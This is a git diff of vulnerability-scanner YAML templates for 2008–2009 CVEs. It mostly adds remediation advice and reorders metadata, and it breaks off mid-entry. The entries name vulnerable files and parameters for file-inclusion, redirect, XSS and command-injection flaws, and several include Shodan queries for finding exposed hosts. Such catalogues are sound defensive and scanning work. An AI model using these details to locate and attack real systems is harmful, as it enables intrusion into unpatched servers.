severity: medium description: | Open redirect vulnerability in exchweb/bin/redir.asp in Microsoft Outlook Web Access (OWA) for Exchange Server 2003 SP2 (aka build 6.5.7638) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the URL parameter. + remediation: | + Apply the necessary security patches or upgrade to a newer version of Microsoft Exchange Server. reference: - https://nvd.nist.gov/vuln/detail/CVE-2008-1547 - https://www.exploit-db.com/exploits/32489 @@ -17,13 +19,13 @@ info: cve-id: CVE-2008-1547 cwe-id: CWE-601 epss-score: 0.03523 - cpe: cpe:2.3:a:microsoft:exchange_server:2003:sp2:*:*:*:*:*:* epss-percentile: 0.90347 + cpe: cpe:2.3:a:microsoft:exchange_server:2003:sp2:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: http.title:"Outlook" vendor: microsoft product: exchange_server + shodan-query: http.title:"Outlook" tags: cve,cve2008,redirect,owa,exchange,microsoft http: diff --git a/http/cves/2008/CVE-2008-2398.yaml b/http/cves/2008/CVE-2008-2398.yaml index e4f502305f..49edb2bcba 100644 --- a/http/cves/2008/CVE-2008-2398.yaml +++ b/http/cves/2008/CVE-2008-2398.yaml @@ -5,6 +5,8 @@ info: author: unstabl3 severity: medium description: AppServ Open Project 2.5.10 and earlier contains a cross-site scripting vulnerability in index.php which allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter. + remediation: | + Upgrade to a patched version of AppServ Open Project (>=2.5.11) or apply the necessary security patches provided by the vendor. reference: - https://exchange.xforce.ibmcloud.com/vulnerabilities/42546 - http://securityreason.com/securityalert/3896 @@ -15,8 +17,8 @@ info: cve-id: CVE-2008-2398 cwe-id: CWE-79 epss-score: 0.00329 - cpe: cpe:2.3:a:appserv_open_project:appserv:*:*:*:*:*:*:*:* epss-percentile: 0.67268 + cpe: cpe:2.3:a:appserv_open_project:appserv:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: appserv_open_project diff --git a/http/cves/2008/CVE-2008-2650.yaml b/http/cves/2008/CVE-2008-2650.yaml index 93e9e2ef93..2bcda26401 100644 --- a/http/cves/2008/CVE-2008-2650.yaml +++ b/http/cves/2008/CVE-2008-2650.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number. + remediation: | + Upgrade CMSimple to a patched version or apply the necessary security patches provided by the vendor. reference: - http://www.cmsimple.com/forum/viewtopic.php?f=2&t=17 - http://web.archive.org/web/20140729144732/http://secunia.com:80/advisories/30463 @@ -18,8 +20,8 @@ info: cve-id: CVE-2008-2650 cwe-id: CWE-22 epss-score: 0.06344 - cpe: cpe:2.3:a:cmsimple:cmsimple:3.1:*:*:*:*:*:*:* epss-percentile: 0.92723 + cpe: cpe:2.3:a:cmsimple:cmsimple:3.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cmsimple diff --git a/http/cves/2008/CVE-2008-4668.yaml b/http/cves/2008/CVE-2008-4668.yaml index f4be6b963b..399ae2e350 100644 --- a/http/cves/2008/CVE-2008-4668.yaml +++ b/http/cves/2008/CVE-2008-4668.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php. + remediation: | + Upgrade to a patched version of Joomla! Image Browser or apply the necessary security patches to mitigate the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/6618 - http://securityreason.com/securityalert/4464 @@ -16,8 +18,8 @@ info: cve-id: CVE-2008-4668 cwe-id: CWE-22 epss-score: 0.01018 - cpe: cpe:2.3:a:joomla:com_imagebrowser:0.1.5:*:*:*:*:*:*:* epss-percentile: 0.819 + cpe: cpe:2.3:a:joomla:com_imagebrowser:0.1.5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomla diff --git a/http/cves/2008/CVE-2008-4764.yaml b/http/cves/2008/CVE-2008-4764.yaml index f779f0c467..be02a31acd 100644 --- a/http/cves/2008/CVE-2008-4764.yaml +++ b/http/cves/2008/CVE-2008-4764.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Joomla! 2.0.0 RC2 and earlier are susceptible to local file inclusion in the eXtplorer module (com_extplorer) that allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action. + remediation: | + Upgrade Joomla! to a version higher than 2.0.0 RC2 to mitigate the vulnerability. reference: - https://www.exploit-db.com/exploits/5435 - https://exchange.xforce.ibmcloud.com/vulnerabilities/41873 @@ -15,8 +17,8 @@ info: cve-id: CVE-2008-4764 cwe-id: CWE-22 epss-score: 0.00779 - cpe: cpe:2.3:a:extplorer:com_extplorer:*:rc2:*:*:*:*:*:* epss-percentile: 0.79142 + cpe: cpe:2.3:a:extplorer:com_extplorer:*:rc2:*:*:*:*:*:* metadata: max-request: 1 vendor: extplorer diff --git a/http/cves/2008/CVE-2008-5587.yaml b/http/cves/2008/CVE-2008-5587.yaml index cb3f00ca3f..dec0852cf6 100644 --- a/http/cves/2008/CVE-2008-5587.yaml +++ b/http/cves/2008/CVE-2008-5587.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: phpPgAdmin 4.2.1 is vulnerable to local file inclusion in libraries/lib.inc.php when register globals is enabled. Remote attackers can read arbitrary files via a .. (dot dot) in the _language parameter to index.php. + remediation: | + Upgrade phpPgAdmin to a version higher than 4.2.1 or apply the necessary patches provided by the vendor. reference: - https://www.exploit-db.com/exploits/7363 - https://nvd.nist.gov/vuln/detail/CVE-2008-5587 @@ -17,13 +19,13 @@ info: cve-id: CVE-2008-5587 cwe-id: CWE-22 epss-score: 0.02331 - cpe: cpe:2.3:a:phppgadmin:phppgadmin:*:*:*:*:*:*:*:* epss-percentile: 0.88339 + cpe: cpe:2.3:a:phppgadmin:phppgadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.title:"phpPgAdmin" vendor: phppgadmin product: phppgadmin + shodan-query: http.title:"phpPgAdmin" tags: cve,cve2008,lfi,phppgadmin,edb http: diff --git a/http/cves/2008/CVE-2008-6080.yaml b/http/cves/2008/CVE-2008-6080.yaml index 9b258f4b89..e14247ebdd 100644 --- a/http/cves/2008/CVE-2008-6080.yaml +++ b/http/cves/2008/CVE-2008-6080.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + remediation: | + Update Joomla! ionFiles to the latest version or apply the provided patch to mitigate the vulnerability. reference: - https://www.exploit-db.com/exploits/6809 - https://nvd.nist.gov/vuln/detail/CVE-2008-6080 @@ -15,8 +17,8 @@ info: cve-id: CVE-2008-6080 cwe-id: CWE-22 epss-score: 0.00666 - cpe: cpe:2.3:a:codecall:com_ionfiles:4.4.2:*:*:*:*:*:*:* epss-percentile: 0.77115 + cpe: cpe:2.3:a:codecall:com_ionfiles:4.4.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: codecall diff --git a/http/cves/2008/CVE-2008-6172.yaml b/http/cves/2008/CVE-2008-6172.yaml index f5a62ff742..f85d8602a3 100644 --- a/http/cves/2008/CVE-2008-6172.yaml +++ b/http/cves/2008/CVE-2008-6172.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter. + remediation: | + Update Joomla! Component RWCards to the latest version to mitigate the vulnerability. reference: - https://www.exploit-db.com/exploits/6817 - https://nvd.nist.gov/vuln/detail/CVE-2008-6172 @@ -15,8 +17,8 @@ info: cve-id: CVE-2008-6172 cwe-id: CWE-22 epss-score: 0.00447 - cpe: cpe:2.3:a:weberr:rwcards:3.0.11:*:*:*:*:*:*:* epss-percentile: 0.71823 + cpe: cpe:2.3:a:weberr:rwcards:3.0.11:*:*:*:*:*:*:* metadata: max-request: 1 vendor: weberr diff --git a/http/cves/2008/CVE-2008-6222.yaml b/http/cves/2008/CVE-2008-6222.yaml index cd116f6329..4ad5b672ef 100644 --- a/http/cves/2008/CVE-2008-6222.yaml +++ b/http/cves/2008/CVE-2008-6222.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Joomla! Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php. + remediation: | + Apply the latest security patches or upgrade to a patched version of Joomla! ProDesk to mitigate the vulnerability. reference: - https://www.exploit-db.com/exploits/6980 - https://nvd.nist.gov/vuln/detail/CVE-2008-6222 @@ -15,8 +17,8 @@ info: cve-id: CVE-2008-6222 cwe-id: CWE-22 epss-score: 0.00832 - cpe: cpe:2.3:a:joomlashowroom:pro_desk_support_center:1.0:*:*:*:*:*:*:* epss-percentile: 0.79864 + cpe: cpe:2.3:a:joomlashowroom:pro_desk_support_center:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomlashowroom diff --git a/http/cves/2008/CVE-2008-6465.yaml b/http/cves/2008/CVE-2008-6465.yaml index c5972dd42c..76b25c9fbc 100644 --- a/http/cves/2008/CVE-2008-6465.yaml +++ b/http/cves/2008/CVE-2008-6465.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks. + remediation: | + Apply the latest security patches or upgrade to a newer version of Parallels H-Sphere to mitigate the XSS vulnerability. reference: - http://www.xssing.com/index.php?x=3&y=65 - https://exchange.xforce.ibmcloud.com/vulnerabilities/45254 @@ -17,14 +19,14 @@ info: cve-id: CVE-2008-6465 cwe-id: CWE-79 epss-score: 0.00421 - cpe: cpe:2.3:a:parallels:h-sphere:3.0.0:p9:*:*:*:*:*:* epss-percentile: 0.70992 + cpe: cpe:2.3:a:parallels:h-sphere:3.0.0:p9:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: title:"Parallels H-Sphere + max-request: 1 vendor: parallels product: h-sphere + shodan-query: title:"Parallels H-Sphere tags: cve,cve2008,xss,parallels,h-sphere http: diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml index bae7db8b1d..7d28c73842 100644 --- a/http/cves/2008/CVE-2008-6668.yaml +++ b/http/cves/2008/CVE-2008-6668.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php. + remediation: | + Upgrade to a patched version of nweb2fax or apply the necessary security patches provided by the vendor. reference: - https://www.exploit-db.com/exploits/5856 - https://exchange.xforce.ibmcloud.com/vulnerabilities/43173 @@ -16,8 +18,8 @@ info: cve-id: CVE-2008-6668 cwe-id: CWE-22 epss-score: 0.00359 - cpe: cpe:2.3:a:dirk_bartley:nweb2fax:*:*:*:*:*:*:*:* epss-percentile: 0.68648 + cpe: cpe:2.3:a:dirk_bartley:nweb2fax:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: dirk_bartley diff --git a/http/cves/2008/CVE-2008-6982.yaml b/http/cves/2008/CVE-2008-6982.yaml index c145905ac5..6fe61a9a36 100644 --- a/http/cves/2008/CVE-2008-6982.yaml +++ b/http/cves/2008/CVE-2008-6982.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/6369 - http://sourceforge.net/projects/devalcms/files/devalcms/devalcms-1.4b/devalcms-1.4b.zip/download @@ -17,11 +19,11 @@ info: cve-id: CVE-2008-6982 cwe-id: CWE-79 epss-score: 0.0038 - cpe: cpe:2.3:a:devalcms:devalcms:1.4a:*:*:*:*:*:*:* epss-percentile: 0.69519 + cpe: cpe:2.3:a:devalcms:devalcms:1.4a:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: devalcms product: devalcms tags: cve,cve2008,devalcms,xss,cms,edb diff --git a/http/cves/2008/CVE-2008-7269.yaml b/http/cves/2008/CVE-2008-7269.yaml index b6eca282e8..d07f8fb1a1 100644 --- a/http/cves/2008/CVE-2008-7269.yaml +++ b/http/cves/2008/CVE-2008-7269.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Open redirect vulnerability in api.php in SiteEngine 5.x allows user-assisted remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the forward parameter in a logout action. + remediation: | + Apply the latest patches or updates provided by the vendor to fix the open redirect vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2008-7269 - https://www.exploit-db.com/exploits/6823 @@ -15,14 +17,14 @@ info: cve-id: CVE-2008-7269 cwe-id: CWE-20 epss-score: 0.01358 - cpe: cpe:2.3:a:boka:siteengine:5.0:*:*:*:*:*:*:* epss-percentile: 0.84524 + cpe: cpe:2.3:a:boka:siteengine:5.0:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: html:"SiteEngine" verified: "true" + max-request: 1 vendor: boka product: siteengine + shodan-query: html:"SiteEngine" tags: cve,cve2008,redirect,siteengine http: diff --git a/http/cves/2009/CVE-2009-0347.yaml b/http/cves/2009/CVE-2009-0347.yaml index f1add98dc1..077a9bc327 100644 --- a/http/cves/2009/CVE-2009-0347.yaml +++ b/http/cves/2009/CVE-2009-0347.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Open redirect vulnerability in cs.html in the Autonomy (formerly Verity) Ultraseek search engine allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the url parameter. + remediation: | + Apply the vendor-supplied patch or upgrade to a newer version of Autonomy Ultraseek that addresses the open redirect vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2009-0347 - https://www.exploit-db.com/exploits/32766 @@ -18,8 +20,8 @@ info: cve-id: CVE-2009-0347 cwe-id: CWE-59 epss-score: 0.09851 - cpe: cpe:2.3:a:autonomy:ultraseek:_nil_:*:*:*:*:*:*:* epss-percentile: 0.94077 + cpe: cpe:2.3:a:autonomy:ultraseek:_nil_:*:*:*:*:*:*:* metadata: max-request: 1 vendor: autonomy diff --git a/http/cves/2009/CVE-2009-0545.yaml b/http/cves/2009/CVE-2009-0545.yaml index 52a6e5fe70..7931daeab2 100644 --- a/http/cves/2009/CVE-2009-0545.yaml +++ b/http/cves/2009/CVE-2009-0545.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: critical description: ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action. + remediation: | + Upgrade to a patched version of ZeroShell. reference: - https://www.exploit-db.com/exploits/8023 - https://nvd.nist.gov/vuln/detail/CVE-2009-0545 @@ -17,8 +19,8 @@ info: cve-id: CVE-2009-0545 cwe-id: CWE-20 epss-score: 0.9719 - cpe: cpe:2.3:a:zeroshell:zeroshell:1.0:beta1:*:*:*:*:*:* epss-percentile: 0.99722 + cpe: cpe:2.3:a:zeroshell:zeroshell:1.0:beta1:*:*:*:*:*:* metadata: max-request: 1 vendor: zeroshell diff --git a/http/cves/2009/CVE-2009-0932.yaml b/http/cves/2009/CVE-2009-0932.yaml index 4a287f995e..59c6109bdc 100644 --- a/http/cves/2009/CVE-2009-0932.yaml +++ b/http/cves/2009/CVE-2009-0932.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 are susceptible to local file inclusion in framework/Image/Image.php because it allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name. + remediation: | + Apply the latest security patches or upgrade to a patched version of Horde/Horde Groupware. reference: - https://www.exploit-db.com/exploits/16154 - http://cvs.horde.org/co.php/groupware/docs/groupware/CHANGES?r=1.28.2.5 @@ -17,8 +19,8 @@ info: cve-id: CVE-2009-0932 cwe-id: CWE-22 epss-score: 0.04048 - cpe: cpe:2.3:a:debian:horde:3.2:*:*:*:*:*:*:* epss-percentile: 0.9095 + cpe: cpe:2.3:a:debian:horde:3.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: debian diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml index b8fda8bbff..19cf80ee3b 100644 --- a/http/cves/2009/CVE-2009-1151.yaml +++ b/http/cves/2009/CVE-2009-1151.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: high description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. + remediation: | + Update PhpMyAdmin to the latest version or apply the necessary patches. reference: - https://www.phpmyadmin.net/security/PMASA-2009-3/ - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 @@ -17,8 +19,8 @@ info: cve-id: CVE-2009-1151 cwe-id: CWE-94 epss-score: 0.79256 - cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* epss-percentile: 0.9785 + cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: phpmyadmin diff --git a/http/cves/2009/CVE-2009-1496.yaml b/http/cves/2009/CVE-2009-1496.yaml index 2a28afbc6c..8c7e3ecedd 100644 --- a/http/cves/2009/CVE-2009-1496.yaml +++ b/http/cves/2009/CVE-2009-1496.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Joomla! Cmimarketplace 0.1 is susceptible to local file inclusion because com_cmimarketplace allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php. + remediation: | + Apply the latest patch or upgrade to a newer version of Joomla! Cmimarketplace to mitigate the vulnerability. reference: - https://www.exploit-db.com/exploits/8367 - https://nvd.nist.gov/vuln/detail/CVE-2009-1496 @@ -15,8 +17,8 @@ info: cve-id: CVE-2009-1496 cwe-id: CWE-22 epss-score: 0.00533 - cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* epss-percentile: 0.7415 + cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomla diff --git a/http/cves/2009/CVE-2009-1558.yaml b/http/cves/2009/CVE-2009-1558.yaml index 26800f31ff..621d69493b 100644 --- a/http/cves/2009/CVE-2009-1558.yaml +++ b/http/cves/2009/CVE-2009-1558.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Cisco Linksys WVC54GCA 1.00R22/1.00R24 is susceptible to local file inclusion in adm/file.cgi because it allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter. + remediation: | + Apply the latest firmware update provided by Cisco to fix the local file inclusion vulnerability. reference: - https://www.exploit-db.com/exploits/32954 - http://www.vupen.com/english/advisories/2009/1173 @@ -17,8 +19,8 @@ info: cve-id: CVE-2009-1558 cwe-id: CWE-22 epss-score: 0.00901 - cpe: cpe:2.3:h:cisco:wvc54gca:1.00r22:*:*:*:*:*:*:* epss-percentile: 0.80705 + cpe: cpe:2.3:h:cisco:wvc54gca:1.00r22:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cisco diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml index 8d7ce456af..4ccde8be73 100644 --- a/http/cves/2009/CVE-2009-1872.yaml +++ b/http/cves/2009/CVE-2009-1872.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: medium description: Adobe ColdFusion Server 8.0.1 and earlier contain multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm. + remediation: | + Upgrade Adobe Coldfusion to a version higher than 8.0.1 or apply the necessary patches provided by the vendor. reference: - https://www.tenable.com/cve/CVE-2009-1872 - http://www.adobe.com/support/security/bulletins/apsb09-12.html @@ -16,14 +18,14 @@ info: cve-id: CVE-2009-1872 cwe-id: CWE-79 epss-score: 0.3657 - cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* epss-percentile: 0.96635 + cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.component:"Adobe ColdFusion" verified: true + max-request: 1 vendor: adobe product: coldfusion + shodan-query: http.component:"Adobe ColdFusion" tags: cve,cve2009,adobe,xss,coldfusion,tenable http: diff --git a/http/cves/2009/CVE-2009-2015.yaml b/http/cves/2009/CVE-2009-2015.yaml index 6d39f72fa9..7da1d0d2c5 100644 --- a/http/cves/2009/CVE-2009-2015.yaml +++ b/http/cves/2009/CVE-2009-2015.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion). + remediation: | + Update Joomla! MooFAQ to the latest version or apply the official patch provided by the vendor. reference: - https://www.exploit-db.com/exploits/8898 - http://www.vupen.com/english/advisories/2009/1530 @@ -15,8 +17,8 @@ info: cve-id: CVE-2009-2015 cwe-id: CWE-22 epss-score: 0.00813 - cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* epss-percentile: 0.79614 + cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomla diff --git a/http/cves/2009/CVE-2009-2100.yaml b/http/cves/2009/CVE-2009-2100.yaml index 7fa974b22c..efd4822da4 100644 --- a/http/cves/2009/CVE-2009-2100.yaml +++ b/http/cves/2009/CVE-2009-2100.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Joomla! JoomlaPraise Projectfork (com_projectfork) 2.0.10 allows remote attackers to read arbitrary files via local file inclusion in the section parameter to index.php. + remediation: | + Upgrade to a patched version of JoomlaPraise Projectfork or apply the necessary security patches to mitigate the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/8946 - https://nvd.nist.gov/vuln/detail/CVE-2009-2100 @@ -14,8 +16,8 @@ info: cve-id: CVE-2009-2100 cwe-id: CWE-22 epss-score: 0.00528 - cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* epss-percentile: 0.74045 + cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomla diff --git a/http/cves/2009/CVE-2009-3053.yaml b/http/cves/2009/CVE-2009-3053.yaml index 1652ecc119..77f8c9c527 100644 --- a/http/cves/2009/CVE-2009-3053.yaml +++ b/http/cves/2009/CVE-2009-3053.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php. + remediation: | + Apply the latest security patches or upgrade to a patched version of Joomla! Agora to mitigate the vulnerability. reference: - https://www.exploit-db.com/exploits/9564 - https://exchange.xforce.ibmcloud.com/vulnerabilities/52964 @@ -16,8 +18,8 @@ info: cve-id: CVE-2009-3053 cwe-id: CWE-22 epss-score: 0.00367 - cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* epss-percentile: 0.69025 + cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomla diff --git a/http/cves/2009/CVE-2009-3318.yaml b/http/cves/2009/CVE-2009-3318.yaml index c4a7650b54..e458678e4b 100644 --- a/http/cves/2009/CVE-2009-3318.yaml +++ b/http/cves/2009/CVE-2009-3318.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Joomla! Roland Breedveld Album 1.14 (com_album) is susceptible to local file inclusion because it allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php. + remediation: | + Update to the latest version of Joomla! Roland Breedveld Album and apply any available patches or security updates. reference: - https://www.exploit-db.com/exploits/9706 - https://nvd.nist.gov/vuln/detail/CVE-2009-3318 @@ -15,8 +17,8 @@ info: cve-id: CVE-2009-3318 cwe-id: CWE-22 epss-score: 0.00706 - cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* epss-percentile: 0.77913 + cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomla diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml index e1016994ea..a056354cce 100644 --- a/http/cves/2009/CVE-2009-4202.yaml +++ b/http/cves/2009/CVE-2009-4202.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Joomla! Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php. + remediation: | + Upgrade to a patched version of Joomla! Omilen Photo Gallery or apply the necessary security patches to mitigate the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/8870 - http://www.vupen.com/english/advisories/2009/1494 @@ -16,8 +18,8 @@ info: cve-id: CVE-2009-4202 cwe-id: CWE-22 epss-score: 0.01956 - cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* epss-percentile: 0.87217 + cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomla diff --git a/http/cves/2009/CVE-2009-4223.yaml b/http/cves/2009/CVE-2009-4223.yaml index 5052031710..1d7023e9a8 100644 --- a/http/cves/2009/CVE-2009-4223.yaml +++ b/http/cves/2009/CVE-2009-4223.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: high description: KR-Web 1.1b2 and prior contain a remote file inclusion vulnerability via adm/krgourl.php, which allows remote attackers to execute arbitrary PHP code via a URL in the DOCUMENT_ROOT parameter. + remediation: | + Upgrade to a patched version of KR-Web or apply the necessary security patches to fix the remote file inclusion vulnerability. reference: - https://sourceforge.net/projects/krw/ - https://www.exploit-db.com/exploits/10216 @@ -17,8 +19,8 @@ info: cve-id: CVE-2009-4223 cwe-id: CWE-94 epss-score: 0.01041 - cpe: cpe:2.3:a:gianni_tommasi:kr-php_web_content_server:*:beta_2:*:*:*:*:*:* epss-percentile: 0.82106 + cpe: cpe:2.3:a:gianni_tommasi:kr-php_web_content_server:*:beta_2:*:*:*:*:*:* metadata: max-request: 1 vendor: gianni_tommasi diff --git a/http/cves/2009/CVE-2009-4679.yaml b/http/cves/2009/CVE-2009-4679.yaml index 5104703c40..9d47d0e5cd 100644 --- a/http/cves/2009/CVE-2009-4679.yaml +++ b/http/cves/2009/CVE-2009-4679.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Joomla! Portfolio Nexus 1.5 contains a remote file inclusion vulnerability in the inertialFATE iF (com_if_nexus) component that allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Apply the latest security patches and updates provided by Joomla! to fix the Remote File Inclusion vulnerability. reference: - https://www.exploit-db.com/exploits/33440 - https://nvd.nist.gov/vuln/detail/CVE-2009-4679 @@ -16,8 +18,8 @@ info: cve-id: CVE-2009-4679 cwe-id: CWE-22 epss-score: 0.00826 - cpe: cpe:2.3:a:inertialfate:com_if_nexus:1.5:*:*:*:*:*:*:* epss-percentile: 0.79783 + cpe: cpe:2.3:a:inertialfate:com_if_nexus:1.5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: inertialfate diff --git a/http/cves/2009/CVE-2009-5020.yaml b/http/cves/2009/CVE-2009-5020.yaml index ee6ca70805..136b2f76e8 100644 --- a/http/cves/2009/CVE-2009-5020.yaml +++ b/http/cves/2009/CVE-2009-5020.yaml @@ -5,18 +5,18 @@ info: author: pdteam severity: medium description: An open redirect vulnerability in awredir.pl in AWStats < 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. + remediation: Apply all relevant security patches and product upgrades. reference: - https://nvd.nist.gov/vuln/detail/CVE-2009-5020 - http://awstats.sourceforge.net/docs/awstats_changelog.txt - remediation: Apply all relevant security patches and product upgrades. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:P cvss-score: 5.8 cve-id: CVE-2009-5020 cwe-id: CWE-20 epss-score: 0.00215 - cpe: cpe:2.3:a:awstats:awstats:*:*:*:*:*:*:*:* epss-percentile: 0.58808 + cpe: cpe:2.3:a:awstats:awstats:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: awstats diff --git a/http/cves/2009/CVE-2009-5114.yaml b/http/cves/2009/CVE-2009-5114.yaml index c4ce006a35..468484b262 100644 --- a/http/cves/2009/CVE-2009-5114.yaml +++ b/http/cves/2009/CVE-2009-5114.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter. + remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/36994 - 